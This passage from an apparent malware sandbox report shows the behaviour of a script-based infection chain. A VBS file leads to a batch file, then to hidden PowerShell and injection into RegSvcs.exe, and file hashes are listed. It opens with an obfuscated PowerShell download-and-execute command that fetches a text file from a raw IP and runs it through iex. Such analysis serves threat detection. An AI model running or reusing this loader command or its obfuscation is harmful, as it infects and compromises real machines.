¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:2900
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1144
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
195B
MD56c8a34a94e068b809145df09acbe153c
SHA10ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA51241431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805
-
Filesize
1000KB
MD58469f5b76df0f510fe02b1eab0f57226
SHA17ad6c79dc42aafd7b813353c8bdcb1204c376621
SHA256a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279
SHA512526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4
-
Filesize
686B
MD5741b5b0a474f0e0cd28fd880f68723c0
SHA14de5489c4e56882514b3ab432048200eae65f90d
SHA256f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA5123783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54